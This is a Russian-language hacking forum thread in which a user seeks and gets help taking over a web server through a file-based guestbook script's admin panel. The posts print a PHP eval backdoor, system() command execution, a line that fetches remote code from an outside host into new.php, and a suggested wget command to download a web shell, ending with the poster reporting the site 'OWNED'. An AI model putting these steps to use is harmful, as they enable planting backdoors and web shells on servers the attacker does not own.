Собственно интересует наличие уязвимостей данного движка гостевой книги.

Есть доступ в админку

Движок работает только на файлах без использования внешних бд

В админке можно включить html код в коментариях но толку от этого никакого

Можно задать имя бд например config.php и слить дамп в формате .dat файла. но толку от этого тоже никакого т.к. из своей директории путем "../../../" выбраться нельзя.

Есть загрузка дампа для востановления бд но ни шелл ни дамп не льётся на сервер.

Исходники движка можно скачать тут:

http://gb.lugr.ru/

Может кто нибудь подскажет как разбомбить это NoName скрипт?

Через админку удалось записать бэкдор типа:


eval($_REQUEST[e]);

После чего успешно выполнил phpinfo();

далее пытаюсь залить шелл:


$fh = fopen('new.php', "a+");fwrite($fh, file_get_contents('http://somesite.ru/newfile.txt'));fclose($fh);

и мне выдаёт:


Method Not Implemented

GET to /xxxx/ not supported.


Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.


Так же успешно выполняется команда system(ls);

но никуда попасть больше не могу... Получаю Method Not Implemented

Подскажите как действовать дальше?

Вместо ls сделай "wget http://*путь до шелла в формате txt* -o shell.php"

↑ (https://antichat.live/posts/3873326/)
Вместо ls сделай "wget
http://*путь
до шелла в формате txt* -o shell.php"


Тоже самое.

Method Not Implemented

это WAF? allow_url_fopen? только с GET так? какие загрузчики пробовали? может лучше сделать мини аплоадер файлов?

↑ (https://antichat.live/posts/3873368/)
это WAF? allow_url_fopen? только с GET так? какие загрузчики пробовали? может лучше сделать мини аплоадер файлов?


1.По поводу WAF не знаю.

2.allow_url_fopen on

3.Пост запросы не пробовал

4.мини аплоадер методом POST?

Если можно ссылочку для примера.

Получилось сделать мини аплоадер с методом POST. Спасибо. Script OWNED